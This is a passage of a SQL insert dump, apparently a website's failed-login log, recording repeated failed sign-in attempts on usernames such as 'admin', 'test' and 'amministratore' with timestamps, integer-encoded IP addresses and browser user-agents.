(103113, 1499358619.775153, 1, 'loginFailInvalidUsername', 'test', 0, 3467968148, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103114, 1499358620.872011, 1, 'loginFailInvalidUsername', 'test', 0, 3467968148, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103115, 1499358987.183462, 1, 'loginFailInvalidUsername', 'test', 0, 1602728795, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103116, 1499358988.298176, 1, 'loginFailInvalidUsername', 'test', 0, 1602728795, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103117, 1499359379.757908, 1, 'loginFailInvalidUsername', 'test', 0, 1892391550, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103118, 1499359384.518750, 1, 'loginFailInvalidUsername', 'test', 0, 1892391550, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103119, 1499362597.438259, 1, 'loginFailInvalidUsername', 'test', 0, 2058401108, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103120, 1499367516.289467, 1, 'loginFailInvalidUsername', 'test', 0, 531691445, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101787, 1498073278.677671, 1, 'loginFailValidUsername', 'admin', 1, 3181235630, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101786, 1498072934.329857, 1, 'loginFailValidUsername', 'admin', 1, 2945352912, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101785, 1498071605.811675, 1, 'loginFailValidUsername', 'admin', 1, 411506089, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101784, 1498071604.402361, 1, 'loginFailValidUsername', 'admin', 1, 411506089, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101783, 1498069222.467939, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101782, 1498068631.927366, 1, 'loginFailValidUsername', 'admin', 1, 1569349340, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101781, 1498068630.930973, 1, 'loginFailValidUsername', 'admin', 1, 1569349340, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101780, 1498068241.212774, 1, 'loginFailValidUsername', 'admin', 1, 1743128234, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101779, 1498068239.869482, 1, 'loginFailValidUsername', 'admin', 1, 1743128234, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101778, 1498068082.601883, 1, 'loginFailValidUsername', 'admin', 1, 3271794354, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101777, 1498068081.326275, 1, 'loginFailValidUsername', 'admin', 1, 3271794354, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101776, 1498063803.063333, 1, 'loginFailValidUsername', 'admin', 1, 3104057687, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101775, 1498063801.882317, 1, 'loginFailValidUsername', 'admin', 1, 3104057687, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101774, 1498062428.456004, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101773, 1498060337.713513, 1, 'loginFailValidUsername', 'admin', 1, 3003616505, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101772, 1498060336.316402, 1, 'loginFailValidUsername', 'admin', 1, 3003616505, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101771, 1498057918.073442, 1, 'loginFailValidUsername', 'admin', 1, 3000937203, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101770, 1498057917.004727, 1, 'loginFailValidUsername', 'admin', 1, 3000937203, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101769, 1498056988.970033, 1, 'loginFailValidUsername', 'admin', 1, 2988447399, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101768, 1498056988.085147, 1, 'loginFailValidUsername', 'admin', 1, 2988447399, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101767, 1498055661.688157, 1, 'loginFailValidUsername', 'admin', 1, 1375311440, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101766, 1498055660.648370, 1, 'loginFailValidUsername', 'admin', 1, 1375311440, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101765, 1498054319.087232, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101764, 1498053409.041622, 1, 'loginFailValidUsername', 'admin', 1, 2979846103, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101763, 1498053407.525129, 1, 'loginFailValidUsername', 'admin', 1, 2979846103, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101762, 1498052530.407631, 1, 'loginFailValidUsername', 'julie', 2, 1546258433, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(101761, 1498049296.946549, 1, 'loginFailValidUsername', 'admin', 1, 2959089953, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101760, 1498049295.710437, 1, 'loginFailValidUsername', 'admin', 1, 2959089953, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101759, 1498046519.162745, 1, 'loginFailValidUsername', 'admin', 1, 1856586988, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101758, 1498046517.609319, 1, 'loginFailValidUsername', 'admin', 1, 1856586988, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101757, 1498046287.194604, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101756, 1498043376.048914, 1, 'loginFailValidUsername', 'admin', 1, 1459852167, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101755, 1498043370.907320, 1, 'loginFailValidUsername', 'admin', 1, 1459852167, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101754, 1498043098.094924, 1, 'loginFailValidUsername', 'admin', 1, 1279580798, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101753, 1498043096.854560, 1, 'loginFailValidUsername', 'admin', 1, 1279580798, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101752, 1498040986.466949, 1, 'loginFailValidUsername', 'admin', 1, 1506386598, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101751, 1498040985.478783, 1, 'loginFailValidUsername', 'admin', 1, 1506386598, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101750, 1498040629.976274, 1, 'loginFailValidUsername', 'admin', 1, 1337055094, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101749, 1498040515.962553, 1, 'loginFailValidUsername', 'admin', 1, 1021415560, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101748, 1498040472.061713, 1, 'loginFailValidUsername', 'admin', 1, 1359429954, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101747, 1498040470.990846, 1, 'loginFailValidUsername', 'admin', 1, 1359429954, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101746, 1498038500.281597, 1, 'loginFailValidUsername', 'admin', 1, 695411646, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101745, 1498038498.612477, 1, 'loginFailValidUsername', 'admin', 1, 695411646, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101744, 1498037969.098850, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101743, 1498037816.444488, 1, 'loginFailValidUsername', 'admin', 1, 1556308942, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101742, 1498035796.314539, 1, 'loginFailValidUsername', 'admin', 1, 1118428951, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101741, 1498035795.126252, 1, 'loginFailValidUsername', 'admin', 1, 1118428951, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101740, 1498035690.100213, 1, 'loginFailValidUsername', 'admin', 1, 1328147598, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101739, 1498035683.537826, 1, 'loginFailValidUsername', 'admin', 1, 1328147598, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101738, 1498034923.308564, 1, 'loginFailValidUsername', 'admin', 1, 1337221594, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101737, 1498032888.228330, 1, 'loginFailValidUsername', 'admin', 1, 1856920432, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101736, 1498032886.478639, 1, 'loginFailValidUsername', 'admin', 1, 1856920432, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101735, 1498031361.340099, 1, 'loginFailValidUsername', 'admin', 1, 1587342918, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101734, 1498030435.845342, 1, 'loginFailValidUsername', 'admin', 1, 1207855921, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101733, 1498030434.536906, 1, 'loginFailValidUsername', 'admin', 1, 1207855921, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101732, 1498030049.233906, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101731, 1498029532.413762, 1, 'loginFailValidUsername', 'admin', 1, 3000960804, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101730, 1498029531.362678, 1, 'loginFailValidUsername', 'admin', 1, 3000960804, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101729, 1498029511.314517, 1, 'loginFailValidUsername', 'admin', 1, 1187187367, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101728, 1498029509.906781, 1, 'loginFailValidUsername', 'admin', 1, 1187187367, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101727, 1498027680.124962, 1, 'loginFailValidUsername', 'admin', 1, 832017728, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101726, 1498027658.602266, 1, 'loginFailValidUsername', 'admin', 1, 3162614869, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(101725, 1498027626.462025, 1, 'loginFailValidUsername', 'admin', 1, 3155022212, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(101724, 1498026975.552474, 1, 'loginFailValidUsername', 'admin', 1, 3661641996, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(101723, 1498022558.519152, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101722, 1498019095.418519, 1, 'loginFailValidUsername', 'admin', 1, 2945386850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101721, 1498017274.542239, 1, 'loginFailValidUsername', 'admin', 1, 3535466845, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101720, 1498017272.871030, 1, 'loginFailValidUsername', 'admin', 1, 3535466845, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101719, 1498015746.755682, 1, 'loginFailValidUsername', 'admin', 1, 1053979479, 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB5)'),
(101718, 1498015571.098386, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101717, 1498013595.981818, 1, 'loginFailValidUsername', 'admin', 1, 3368662074, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101716, 1498013594.664284, 1, 'loginFailValidUsername', 'admin', 1, 3368662074, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101715, 1498013039.502768, 1, 'loginFailValidUsername', 'admin', 1, 3374681884, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101714, 1498008647.151771, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101713, 1498007571.126202, 1, 'loginFailValidUsername', 'admin', 1, 2321456046, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101712, 1498007569.315684, 1, 'loginFailValidUsername', 'admin', 1, 2321456046, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101711, 1497999843.367453, 1, 'loginFailValidUsername', 'admin', 1, 49282867, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101710, 1497999842.087503, 1, 'loginFailValidUsername', 'admin', 1, 49282867, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101709, 1497999469.476597, 1, 'loginFailValidUsername', 'admin', 1, 1358088689, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101708, 1497998150.124967, 1, 'loginFailValidUsername', 'admin', 1, 93338852, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101707, 1497998149.060720, 1, 'loginFailValidUsername', 'admin', 1, 93338852, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101706, 1497996319.058161, 1, 'loginFailValidUsername', 'admin', 1, 2955644117, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101705, 1497994691.694276, 1, 'loginFailValidUsername', 'admin', 1, 2977849083, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101704, 1497994690.060853, 1, 'loginFailValidUsername', 'admin', 1, 2977849083, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101703, 1497994400.003932, 1, 'loginFailValidUsername', 'admin', 1, 2974496574, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101702, 1497994397.246968, 1, 'loginFailValidUsername', 'admin', 1, 2974496574, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101701, 1497992475.301848, 1, 'loginFailValidUsername', 'admin', 1, 1600021915, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101700, 1497992474.317692, 1, 'loginFailValidUsername', 'admin', 1, 1600021915, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101699, 1497991546.449353, 1, 'loginFailValidUsername', 'admin', 1, 629625464, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101698, 1497991545.267727, 1, 'loginFailValidUsername', 'admin', 1, 629625464, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101697, 1497991484.049882, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101696, 1497989071.583200, 1, 'loginFailValidUsername', 'admin', 1, 1435149827, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101695, 1497989070.339537, 1, 'loginFailValidUsername', 'admin', 1, 1435149827, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101694, 1497989037.937402, 1, 'loginFailValidUsername', 'admin', 1, 39255185, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101693, 1497989036.534000, 1, 'loginFailValidUsername', 'admin', 1, 39255185, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101692, 1497988057.074439, 1, 'loginFailValidUsername', 'admin', 1, 1728662503, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101691, 1497988055.685251, 1, 'loginFailValidUsername', 'admin', 1, 1728662503, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101690, 1497987933.355412, 1, 'loginFailValidUsername', 'admin', 1, 1547443325, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101689, 1497987932.256528, 1, 'loginFailValidUsername', 'admin', 1, 1547443325, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101688, 1497987472.077714, 1, 'loginFailValidUsername', 'admin', 1, 1743247718, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101687, 1497987470.665440, 1, 'loginFailValidUsername', 'admin', 1, 1743247718, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101686, 1497987406.122454, 1, 'loginFailValidUsername', 'admin', 1, 3192913058, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101685, 1497985824.148151, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101684, 1497985716.447654, 1, 'loginFailValidUsername', 'admin', 1, 3036536582, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101683, 1497985714.434126, 1, 'loginFailValidUsername', 'admin', 1, 3036536582, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101682, 1497983740.432259, 1, 'loginFailValidUsername', 'admin', 1, 694796831, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101681, 1497983737.922523, 1, 'loginFailValidUsername', 'admin', 1, 694796831, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101680, 1497979811.616526, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101679, 1497978663.777157, 1, 'loginFailValidUsername', 'admin', 1, 3244037298, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101678, 1497978661.612184, 1, 'loginFailValidUsername', 'admin', 1, 3244037298, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101677, 1497978053.777117, 1, 'loginFailValidUsername', 'admin', 1, 1389428352, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101676, 1497978052.364604, 1, 'loginFailValidUsername', 'admin', 1, 1389428352, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101675, 1497977712.517301, 1, 'loginFailValidUsername', 'admin', 1, 2107721451, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101674, 1497977709.991793, 1, 'loginFailValidUsername', 'admin', 1, 2107721451, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101673, 1497972675.801396, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101672, 1497971420.193250, 1, 'loginFailValidUsername', 'admin', 1, 704136757, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101671, 1497971418.900500, 1, 'loginFailValidUsername', 'admin', 1, 704136757, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101670, 1497970099.701574, 1, 'loginFailValidUsername', 'admin', 1, 1442063276, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101669, 1497970098.273162, 1, 'loginFailValidUsername', 'admin', 1, 1442063276, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101668, 1497965934.414187, 1, 'loginFailValidUsername', 'admin', 1, 3316062394, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101667, 1497965929.837402, 1, 'loginFailValidUsername', 'admin', 1, 3316062394, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101666, 1497964457.913483, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101665, 1497956807.893619, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101664, 1497956552.989658, 1, 'loginFailValidUsername', 'admin', 1, 3000964923, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101663, 1497956551.934442, 1, 'loginFailValidUsername', 'admin', 1, 3000964923, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101662, 1497955206.365487, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101661, 1497955206.058822, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101660, 1497955205.752027, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101659, 1497955205.435969, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101658, 1497955205.127477, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101657, 1497955204.821596, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101656, 1497955204.516860, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101655, 1497955204.211527, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101654, 1497955203.904389, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101653, 1497955203.593149, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101652, 1497955203.288163, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101651, 1497955202.980402, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101650, 1497955202.671709, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101649, 1497955202.361781, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101648, 1497955202.052697, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101647, 1497955201.741498, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101646, 1497955201.433845, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101645, 1497955201.127068, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
